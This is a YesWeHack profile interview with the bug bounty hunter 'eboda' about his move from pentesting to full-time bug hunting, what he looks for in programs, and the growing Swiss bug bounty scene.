YESWEHACK PROPHILE ON EBODA

December 11, 2019



┌▄──────────────────────────────────────────────────────────────────────▄┐
├■▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄■[ YESWEHACK PROPHILE ON EBODA ]■▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄■┤
├■──────────────────────────────────────────────────────────────────────■┤
├■▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀■┤
└▀──────────────────────────────────────────────────────────────────────▀┘
Wed, 11 Dec 2019 12:04:26 +0100 (CET)
╔══════════════════════════════════ WHOIS ═══════════════════════════════╗
║              Handle: eboda                                             ║
║       Handle origin: first name + last name (i'm very creative :>)     ║
║                       or maybe: 'adobe'[::-1], who knows...            ║
║    Age of your body: 29                                                ║
║         Produced in: Germany                                           ║
║                Urlz: https://bugscale.ch / @eboda_                     ║
║           Computers: Just got the new Thinkpad X1 extreme              ║
                      (I am part of the cult worshipping                ║
║                       the Thinkpad nipple)                             ║
║         Superpowers: I can fly                                         ║
║  Life in a sentence: Eat Sleep Pwn Repeat (höhö)                       ║
╚════════════════════════════════════════════════════════════════════════╝

QUOTES
╔════════════════════════════════════════════════════════════════════════╗
║ Any man who must say "I am king" is no true king at all                ║
╚════════════════════════════════════════════════════════════════════════╝

ARMORY
╔════════════════════════════════════════════════════════════════════════╗
║ Mostly just Burp                                                       ║
║  I do not do any automated testing or crazy recon, so I don't use many ║
║ other specific tools.                                                  ║
╚════════════════════════════════════════════════════════════════════════╝

▀▄█▓▒░ Hello, what's your background?:
│  ───────────────────────────────────────────────────────────────────
└─  Hi! Professionally I was working as a pentester in Switzerland
    before starting to do bug hunting and research full-time.
    Less professionally, I used to play a lot of CTFs with my team Eat
    Sleep Pwn Repeat.


▀▄█▓▒░ How did you come to Bug Bounty ?
│  ───────────────────────────────────────────────────────────────────
└─  I did a bit of bug bounty hunting on and off a few years back.
    This year I quit my pentesting job and decided to pursue bug hunting
    as a full-time career. Now that it's up to me to choose targets to
    work on, I can spend all my time doing cool research on targets
    I personally am interested in or that use some cool tech :)


▀▄█▓▒░ You have practiced others BB platforms, what are the Pro & Cons,with your experience on those platforms? / What are your
│  expectations?
│  ───────────────────────────────────────────────────────────────────
└─  I am active on multiple platforms because it allows me to reach
    more targets. When it comes to choosing a program to work on I am
    quite nit-picky, so the more choice the better!

    Some things I'm looking for in a program:
    - Great payout (obviously, who are we kidding...)
    - Well defined scope. I don't like recon at all, so I prefer
    to be given a small list of applications to pwn
    - Does it have source code available? HUGE plus
    - Responsive and fair team. Can't really know that before your
    first reports

    My expectations to programs are pretty straight-forward. I took the
    time and effort to test your application and (hopefully) report a
    bug, in return I expect fair treatment according to the rules you
    have published :)

    Fool me once shame on you, fool me twice shame on me. If you try
    to pull some tricks I will just move on to another target.

    As to BB platforms themselves, it is very important for me that the
    communication is efficient. It's just so much more pleasant to report
    bugs when you have professional triagers who understand what you
    are talking about and can intervene if you face problems with
    programs.


▀▄█▓▒░  Appart from Bug Bounty you seem to collaborate on a lot of hacker
|   events, what is your feeling on how the community is evolving?
│  ───────────────────────────────────────────────────────────────────
└─  Recently, together with some friends we have created a company
    called Bugscale to participate in bug bounties and do security
    research in general. It allows us to collaborate on our work
    efficiently, since we all chill in the same office.

    In Switzerland the BB community is still in its infancy, as there is
    not many BB programs and you can probably count the hunters living
    from it on one hand. As far as we know, we are the first company
    in Switzerland to actually make a living off of Bug Bounties.

    This year has seen enormous change for us though. Not only did
    YesWeHack create a subsidiary in Switzerland, but additionally BB
    programs are becoming more mainstream with conferences dedicating
    their theme to BB (see Swiss Cyber Storm for example)
    and Swiss companies actively trying to launch their BB programs.

    The future is definitely bright for us and especially in Switzerland
    the community will evolve immensely in the upcoming years!


▀▄█▓▒░  What was your first computer?
│  ───────────────────────────────────────────────────────────────────
└─  My first computer was mostly used to play CS1.6 and Warcraft 3 :D
    Didn't do much hacking back then...


▀▄█▓▒░  Do you remember your first successful exploitation?
│  ───────────────────────────────────────────────────────────────────
└─  Not really to be honest... I guess it wasn't worth remembering :D
    When I was younger I was very much into something I would describe
    SQL injection "competitions". Basically, someone would post a
    website with a SQLi vuln and a WAF and the challenge was to dump
    all table names with a single query for example. You would end up
    with these huge SQL queries that bypass the WAF, concat results
    into variables and then dump those. It was kind of the thing that
    got me interested in security in the first place (that and CTFs).


▀▄█▓▒░  What keeps you going / What turns you down?
│  ───────────────────────────────────────────────────────────────────
└─  The thrill of finding a cool vuln and writing an exploit for it.

    Doing things I don't enjoy turns me down (who would have thought :D).
    In the BB context this might include things like recon or writing
    reports :>>


▀▄█▓▒░  Is there a life AFK?
│  ───────────────────────────────────────────────────────────────────
└─  No of course not! jk... I have relocated to beautiful Switzerland
    some time ago, so there is no shortage of AFK life outside in
    the mountains.
    Depending on the season, I like to hike, ski or fly with my
    paraglider :)
    Also I'm into CS:GO, but that's technically not AFK I guess :D


▀▄█▓▒░  What is the future?
│  ───────────────────────────────────────────────────────────────────
└─  In Europe and Switzerland specifically I think we will see a sharp
    increase in companies adopting bug bounty programs. With YesWeHack
    being in Switzerland itself now, it will make it easier for
    companies to overcome initial hesitation or uncertainty regarding
    bug bounties.

    In any case, there will always be bugs, so in one way or another
    we will be able to keep busy ;)


--------[ EOF